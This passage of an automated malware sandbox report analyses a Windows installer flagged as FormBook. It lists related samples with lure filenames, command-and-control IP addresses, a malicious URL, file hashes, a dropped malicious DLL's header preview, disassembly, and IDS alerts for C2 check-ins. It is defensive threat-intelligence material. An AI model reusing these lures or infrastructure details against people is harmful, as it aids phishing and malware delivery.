                                                                • 193.201.126.114
                                                                enjoin 12.16.20.docGet hashmaliciousBrowse
                                                                • 193.201.126.93
                                                                enjoin 12.16.20.docGet hashmaliciousBrowse
                                                                • 193.201.126.93
                                                                enjoin 12.16.20.docGet hashmaliciousBrowse
                                                                • 193.201.126.93
                                                                index.htaGet hashmaliciousBrowse
                                                                • 193.201.126.34
                                                                http://phfvg141cruel.com/analytics/LSQwD5t2BeUGnP/G8_qFgBBGbZjcd8JDXL8c8GstBjE4NUfsHd/zzfp3?hHhX=DHLSFDKlZVUUrAz&ZZnZZ=IeACrr_VRiWdZf_&IEVY=TTWUhlBkEBZi&rKHt=qiYWQbrbKzGGet hashmaliciousBrowse
                                                                • 193.201.126.34
                                                                legislate-12.20.docGet hashmaliciousBrowse
                                                                • 193.201.126.34
                                                                legislate-12.20.docGet hashmaliciousBrowse
                                                                • 193.201.126.34
                                                                input.12.07.2020.docGet hashmaliciousBrowse
                                                                • 193.201.126.22
                                                                DXTL-HKDXTLTseungKwanOServiceHKvbc.exeGet hashmaliciousBrowse
                                                                • 154.86.211.231
                                                                PaymentAdvice.exeGet hashmaliciousBrowse
                                                                • 154.219.109.119
                                                                BL01345678053567.exeGet hashmaliciousBrowse
                                                                • 45.192.251.55
                                                                pvUopSIi7C5Eklw.exeGet hashmaliciousBrowse
                                                                • 156.245.147.6
                                                                payment.exeGet hashmaliciousBrowse
                                                                • 154.219.105.199
                                                                New Order.exeGet hashmaliciousBrowse
                                                                • 45.199.49.95
                                                                BL84995005038483.exeGet hashmaliciousBrowse
                                                                • 45.192.251.55
                                                                SAKKAB QUOTATION_REQUEST.exeGet hashmaliciousBrowse
                                                                • 154.86.211.135
                                                                SwiftMT103_pdf.exeGet hashmaliciousBrowse
                                                                • 154.84.125.40
                                                                1517679127365.exeGet hashmaliciousBrowse
                                                                • 154.219.193.141
                                                                SB210330034.pdf.exeGet hashmaliciousBrowse
                                                                • 154.81.99.74
                                                                Purchase Orders.exeGet hashmaliciousBrowse
                                                                • 45.192.251.43
                                                                QUOTATION REQUEST.exeGet hashmaliciousBrowse
                                                                • 156.239.96.43
                                                                Request an Estimate_2021_04_01.exeGet hashmaliciousBrowse
                                                                • 45.194.211.92
                                                                proforma.exeGet hashmaliciousBrowse
                                                                • 154.219.105.199
                                                                xpy9BhQR3t.xlsxGet hashmaliciousBrowse
                                                                • 154.80.163.105
                                                                oQJT5eueEX.exeGet hashmaliciousBrowse
                                                                • 154.214.73.24
                                                                MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                                • 156.232.242.149
                                                                New Order.xlsxGet hashmaliciousBrowse
                                                                • 156.239.96.50
                                                                SWIFT001_jpg.exeGet hashmaliciousBrowse
                                                                • 175.29.36.135

                                                                JA3 Fingerprints

                                                                No context

                                                                Dropped Files

                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dllUpdated SOA.xlsxGet hashmaliciousBrowse

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Temp\nsxFC1A.tmp\bdww7k1w8bk0.dll
                                                                  Process:C:\Users\user\Desktop\AQJEKNHnWK.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):5120
                                                                  Entropy (8bit):4.157754423334291
                                                                  Encrypted:false
                                                                  SSDEEP:48:St0ZBd/kqM1b5PHhqu8MUEm17OGa4zzBvoAXAdUMQ9BgqRuqS:ld/kfyZUGXHBgVueKx
                                                                  MD5:7C0BF830FA76E4A4D540EF51EC685997
                                                                  SHA1:00240D0CBD420B9B54F7795E15D1F6E92AE9D2DB
                                                                  SHA-256:6C4628D2A5D9FE67953D21A7AB0FF49BAC94B69FB32B5A1FA94AE8CB71A4D693
                                                                  SHA-512:95AE291760A5AC7F1CC72F7E40387A8E8BCBAFC262F021508D76DAAB0C1CB152C4EE518F156BF44F73014F8292A352E0EA509B3F88787A381F226E303E02E89C
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 21%
                                                                  Joe Sandbox View:
                                                                  • Filename: Updated SOA.xlsx, Detection: malicious, Browse
                                                                  Reputation:low
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L...z.n`...........!......................... ...............................`............@......................... !..T...`".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..0.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                  C:\Users\user\AppData\Local\Temp\s1min5obsmh
                                                                  Process:C:\Users\user\Desktop\AQJEKNHnWK.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6661
                                                                  Entropy (8bit):7.971988981636967
                                                                  Encrypted:false
                                                                  SSDEEP:96:ifIF/0cOvEQzFlnfCS7hoJiYv93UtnfYuxXyEphUzLrxFOrNkdHdFF2wy+jYPdlP:fpF6pzFB8XvwtfKZFzPF01PziTs
                                                                  MD5:EF56F8767AF49E69DA53598A8DD3FE95
                                                                  SHA1:04B3DD6AE4653A9D9191081901D531B5EA35465A
                                                                  SHA-256:B5524B63170C43392C14F0E6CF7E284345C7DDF3BCB5096F23B69AE40B786E9C
                                                                  SHA-512:FA9443B99CBB0B3F42E567D5CDA9A1D7760EE93E9A4186CFDF0B96F3C8B807DBBDA1AD1FD0C9A8D65065C78D841002A8D5255A963AB9BFAAE8E75E5E36827B7D
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: ...u^*.....].%.u...%.Z.L.|.4.z5.3.m ..+...Dw.&....]....*\.6C3.^.ap.g.F23Thk..e.oLM&u.d......@|/..'.8xyR.Y9..d.JKl1......de>.../g(N...D1Y...l...q..$..a....LL.h.<=..M..A....0..Dx[.().;\f.s.g.....ui....M?.`..............~ *.......2............/C.O._.....4W..);:.L....J"..P..:4S..!N.m*#....E.J.@...r`"9Xp.{....+f~SR.."e.z.jd.!1.`.Z.."#Dxs..u(.|}VB......NOp....8..hiB..2..t....@.5-.....[ v9....S.H..<...>..S....4..w..w.,-.....N.... ..qm......GB...~$;.2V....].U.s...S. ...2'E....z....(3.....B..hZ..Z..F.$C....(..J..V.4U.....0..L.......A....G.~.n$.D5f.%Y23i....Q......P...y....A..%F.O`...tuN...B.l....k..z...)......Q........pl.8..Z?\a.....?.!Do..S...8&..W..y...():.t.C...`.i..n..K..a.......*}N......*...y.....^;T;.#>.g..l,...]..K.....U.u..>..n3B..a/..l\../v..Sy;.Jf.+.5...S/.n...W......U-.....M#7XY..$]....j+L.D.H.v.6o.#:G..:U~..t.{L}.j..6..FG.5..\..gX.O.Q....K..`.G..........eQ.....Vi$...V..;>...01...z...)...+n....... ...&..<....di..........&..%....
                                                                  C:\Users\user\AppData\Local\Temp\z48eaiospth
                                                                  Process:C:\Users\user\Desktop\AQJEKNHnWK.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):164864
                                                                  Entropy (8bit):7.998870102830855
                                                                  Encrypted:true
                                                                  SSDEEP:3072:kZaUuXIqUKJjdQ4MuD+gw2NkXhf8HNGLvQlrG3BoPg3yjw57f2p1XQMpyb:gaTXIqU2QADiwk+ovQliaIO1Lp4
                                                                  MD5:30FA9FE5A45263CC2DAD1E49C0B514EE
                                                                  SHA1:B485A73189B8B69E11D6A998FEC0D02ECD97085D
                                                                  SHA-256:460BED5F9F6B0D5E2B70BF57AF995E72CDDFADED4CB666D6D0258EFD3BA1C91C
                                                                  SHA-512:FCAF0498F03D6EAFD0E802591D08635CD271A8CF97747FE1371B7C1A887294F1443F8408B1D28E64E981CE7CBCF62DA801376078C6FA3B2C3776D554D9B44C97
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview: .w...W......T..@.7....d.k.U.snT.]%.~.~.~A+.S.n"...k.......r.j..}..\..2.f...w...7..<].E..?$.........*..9..^..!...MG....4..Vi.._vWMF.7[...........u........f...".4.....Z...`.RhZ~...l..T...MU....4.J....@$...O.fD.t)..c..}W..9G..f..............}E......[.=.<...F......K.q$..9.4.!...~..7..&.....b /......xa[.......0.".^'..........7 Ps...$).YMz~.......].(j.]&.".=..5r.}.e..L[.2.7b....O..5...._...9m6~F_...D...K2Sk\)..]........5.....K...-..k.H...pZ......w.[)d..1WmtG.~.....P#.....F.M.lAp.2...JU2..x...b.B8s.-.....bdU4n...@.(,....q.....`n?/..Vw....6.Y..SB0$.N.`i)p?.w.;b...r..DH../U...aw...Q......j....A...%.d.3Rj...\.9&..9M.A...}.r.w/..'Q!E.%1..+.C.......[r...P`xh............Nt.B...m...Z..8r.w......H..x..t+:.....e..7.....D=.=..2.]..u*+^.j.'o.;.d#MN....!|...]....o..WJ.[`.;.......SuK3..9....... R...q..d.\....x........9".'...(H....0..F.0Zc..cL...........i.8..:f.mJ.wz....63....=..dVK.W........c.....7..........]..y.:..........(.WB.|....[........=.D....S.....E

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                  Entropy (8bit):7.466305160327421
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                  • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:AQJEKNHnWK.exe
                                                                  File size:371388
                                                                  MD5:5d8702803555ff684424ebd13eda9f47
                                                                  SHA1:f8b1197457782ba958fc7178fb838119c8138374
                                                                  SHA256:f7e96b7c6612b709e413bbc8c72796cadbb7ce91ed17ec77d5ba4d4422e729cb
                                                                  SHA512:45b4c4536c3cbb95ca5a93e721fff7e197bd27558f1646bdbdde42db62786cf6d323f056556b05fd4ee6b7806971492e9683a99f17481ce8c1649d872d6b55d9
                                                                  SSDEEP:6144:ndQzbPzOFZni219PFibpbvnl6gTaTXIqU2QADiwk+ovQliaIO1Lpt:k+dONwqYfDiwk+ooli6Vb
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d.H............,...........:...!........&......e.......Rich....................PE..L.....8E.................Z...H<.....J1.....

                                                                  File Icon

                                                                  Icon Hash:0cbeb1368b82a600

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x40314a
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x4538CD0B [Fri Oct 20 13:20:11 2006 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  sub esp, 0000017Ch
                                                                  push ebx
                                                                  push ebp
                                                                  push esi
                                                                  xor esi, esi
                                                                  push edi
                                                                  mov dword ptr [esp+18h], esi
                                                                  mov ebp, 00409240h
                                                                  mov byte ptr [esp+10h], 00000020h
                                                                  call dword ptr [00407030h]
                                                                  push esi
                                                                  call dword ptr [00407270h]
                                                                  mov dword ptr [007A3030h], eax
                                                                  push esi
                                                                  lea eax, dword ptr [esp+30h]
                                                                  push 00000160h
                                                                  push eax
                                                                  push esi
                                                                  push 0079E540h
                                                                  call dword ptr [00407158h]
                                                                  push 00409230h
                                                                  push 007A2780h
                                                                  call 00007FC7F0A14AF8h
                                                                  mov ebx, 007AA400h
                                                                  push ebx
                                                                  push 00000400h
                                                                  call dword ptr [004070B4h]
                                                                  call 00007FC7F0A12239h
                                                                  test eax, eax
                                                                  jne 00007FC7F0A122F6h
                                                                  push 000003FBh
                                                                  push ebx
                                                                  call dword ptr [004070B0h]
                                                                  push 00409228h
                                                                  push ebx
                                                                  call 00007FC7F0A14AE3h
                                                                  call 00007FC7F0A12219h
                                                                  test eax, eax
                                                                  je 00007FC7F0A12412h
                                                                  mov edi, 007A9000h
                                                                  push edi
                                                                  call dword ptr [00407140h]
                                                                  call dword ptr [004070ACh]
                                                                  push eax
                                                                  push edi
                                                                  call 00007FC7F0A14AA1h
                                                                  push 00000000h
                                                                  call dword ptr [00407108h]
                                                                  cmp byte ptr [007A9000h], 00000022h
                                                                  mov dword ptr [007A2F80h], eax
                                                                  mov eax, edi
                                                                  jne 00007FC7F0A122DCh
                                                                  mov byte ptr [esp+10h], 00000022h
                                                                  mov eax, 00000001h

                                                                  Rich Headers

                                                                  Programming Language:
                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x73440xb4.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x3ac0000x28bf7.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x59de0x5a00False0.681293402778data6.5143386598IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x70000x10f20x1200False0.430338541667data5.0554281206IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x90000x39a0340x400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                  .ndata0x3a40000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x3ac0000x28bf70x28c00False0.550972967791data6.60623395491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0x3ac2800xffaaPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                  RT_ICON0x3bc22c0x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                  RT_ICON0x3cca540x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                  RT_ICON0x3d0c7c0x25a8data
                                                                  RT_ICON0x3d32240x10a8data
                                                                  RT_ICON0x3d42cc0x468GLS_BINARY_LSB_FIRST
                                                                  RT_DIALOG0x3d47340x100dataEnglishUnited States
                                                                  RT_DIALOG0x3d48340x11cdataEnglishUnited States
                                                                  RT_DIALOG0x3d49500x60dataEnglishUnited States
                                                                  RT_GROUP_ICON0x3d49b00x5adata
                                                                  RT_MANIFEST0x3d4a0c0x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                  Imports

                                                                  DLLImport
                                                                  KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                  USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                  SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                  ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                  ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                  VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  04/08/21-11:06:58.048885TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.323.227.38.74
                                                                  04/08/21-11:06:58.048885TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.323.227.38.74
                                                                  04/08/21-11:06:58.048885TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972480192.168.2.323.227.38.74
                                                                  04/08/21-11:06:58.188266TCP1201ATTACK-RESPONSES 403 Forbidden804972423.227.38.74192.168.2.3

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 8, 2021 11:06:52.773000956 CEST4972380192.168.2.367.205.188.68
                                                                  Apr 8, 2021 11:06:52.879992962 CEST804972367.205.188.68192.168.2.3
                                                                  Apr 8, 2021 11:06:52.880206108 CEST4972380192.168.2.367.205.188.68
                                                                  Apr 8, 2021 11:06:52.880374908 CEST4972380192.168.2.367.205.188.68
                                                                  Apr 8, 2021 11:06:52.985687017 CEST804972367.205.188.68192.168.2.3
                                                                  Apr 8, 2021 11:06:52.985718966 CEST804972367.205.188.68192.168.2.3
                                                                  Apr 8, 2021 11:06:52.985733986 CEST804972367.205.188.68192.168.2.3
                                                                  Apr 8, 2021 11:06:52.986033916 CEST4972380192.168.2.367.205.188.68
                                                                  Apr 8, 2021 11:06:52.986186028 CEST4972380192.168.2.367.205.188.68
                                                                  Apr 8, 2021 11:06:53.091460943 CEST804972367.205.188.68192.168.2.3
                                                                  Apr 8, 2021 11:06:58.036025047 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:06:58.047981024 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.048360109 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:06:58.048885107 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:06:58.061003923 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188266039 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188327074 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188365936 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188404083 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188433886 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188469887 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188479900 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:06:58.188499928 CEST804972423.227.38.74192.168.2.3
                                                                  Apr 8, 2021 11:06:58.188508987 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:06:58.188664913 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:06:58.188685894 CEST4972480192.168.2.323.227.38.74
                                                                  Apr 8, 2021 11:07:18.802865028 CEST4972780192.168.2.3163.44.185.226
                                                                  Apr 8, 2021 11:07:19.042848110 CEST8049727163.44.185.226192.168.2.3
                                                                  Apr 8, 2021 11:07:19.043051958 CEST4972780192.168.2.3163.44.185.226
                                                                  Apr 8, 2021 11:07:19.043236971 CEST4972780192.168.2.3163.44.185.226
                                                                  Apr 8, 2021 11:07:19.283190966 CEST8049727163.44.185.226192.168.2.3
                                                                  Apr 8, 2021 11:07:19.424396992 CEST8049727163.44.185.226192.168.2.3
                                                                  Apr 8, 2021 11:07:19.424421072 CEST8049727163.44.185.226192.168.2.3
                                                                  Apr 8, 2021 11:07:19.424603939 CEST4972780192.168.2.3163.44.185.226
                                                                  Apr 8, 2021 11:07:19.424669027 CEST4972780192.168.2.3163.44.185.226
                                                                  Apr 8, 2021 11:07:19.666783094 CEST8049727163.44.185.226192.168.2.3
                                                                  Apr 8, 2021 11:07:34.850683928 CEST4973580192.168.2.3103.97.19.74
                                                                  Apr 8, 2021 11:07:35.112793922 CEST8049735103.97.19.74192.168.2.3
                                                                  Apr 8, 2021 11:07:35.112925053 CEST4973580192.168.2.3103.97.19.74
                                                                  Apr 8, 2021 11:07:35.113116980 CEST4973580192.168.2.3103.97.19.74
                                                                  Apr 8, 2021 11:07:35.374846935 CEST8049735103.97.19.74192.168.2.3
                                                                  Apr 8, 2021 11:07:35.378310919 CEST8049735103.97.19.74192.168.2.3
                                                                  Apr 8, 2021 11:07:35.378349066 CEST8049735103.97.19.74192.168.2.3
                                                                  Apr 8, 2021 11:07:35.378587961 CEST4973580192.168.2.3103.97.19.74
                                                                  Apr 8, 2021 11:07:35.378706932 CEST4973580192.168.2.3103.97.19.74
                                                                  Apr 8, 2021 11:07:35.640600920 CEST8049735103.97.19.74192.168.2.3
                                                                  Apr 8, 2021 11:07:40.472934961 CEST4973680192.168.2.391.236.136.12
                                                                  Apr 8, 2021 11:07:43.468976021 CEST4973680192.168.2.391.236.136.12
                                                                  Apr 8, 2021 11:07:49.485086918 CEST4973680192.168.2.391.236.136.12
                                                                  Apr 8, 2021 11:08:04.028669119 CEST4973980192.168.2.391.236.136.12
                                                                  Apr 8, 2021 11:08:05.017740011 CEST4973980192.168.2.391.236.136.12
                                                                  Apr 8, 2021 11:08:07.018599987 CEST4973980192.168.2.391.236.136.12

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Apr 8, 2021 11:05:53.838248014 CEST5128153192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:53.850294113 CEST53512818.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:54.767462015 CEST4919953192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:54.780088902 CEST53491998.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:55.576936960 CEST5062053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:55.588898897 CEST53506208.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:55.994364023 CEST6493853192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:56.013240099 CEST53649388.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:56.528630018 CEST6015253192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:56.542135954 CEST53601528.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:57.762985945 CEST5754453192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:57.775489092 CEST53575448.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:58.579436064 CEST5598453192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:58.592372894 CEST53559848.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:05:59.691778898 CEST6418553192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:05:59.704427004 CEST53641858.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:00.540122986 CEST6511053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:00.553318977 CEST53651108.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:07.722784996 CEST5836153192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:07.735291958 CEST53583618.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:08.512624025 CEST6349253192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:08.525321007 CEST53634928.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:10.533579111 CEST6083153192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:10.545670033 CEST53608318.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:12.219556093 CEST6010053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:12.232131958 CEST53601008.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:20.887840033 CEST5319553192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:20.901355982 CEST53531958.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:21.856024027 CEST5014153192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:21.868674040 CEST53501418.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:23.518732071 CEST5302353192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:23.530659914 CEST53530238.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:25.031708956 CEST4956353192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:25.044179916 CEST53495638.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:26.322977066 CEST5135253192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:26.335850954 CEST53513528.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:29.802376032 CEST5934953192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:29.814527035 CEST53593498.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:30.186429977 CEST5708453192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:30.209305048 CEST53570848.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:43.873467922 CEST5882353192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:43.886384010 CEST53588238.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:47.333250046 CEST5756853192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:47.551381111 CEST53575688.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:49.034631014 CEST5054053192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:49.048317909 CEST53505408.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:52.563858986 CEST5436653192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:52.765392065 CEST53543668.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:58.004676104 CEST5303453192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:58.033833981 CEST53530348.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:06:58.706139088 CEST5776253192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:06:58.724343061 CEST53577628.8.8.8192.168.2.3
                                                                  Apr 8, 2021 11:07:03.231091022 CEST5543553192.168.2.38.8.8.8
                                                                  Apr 8, 2021 11:07:03.430695057 CEST53554358.8.8.8192.168.2.3
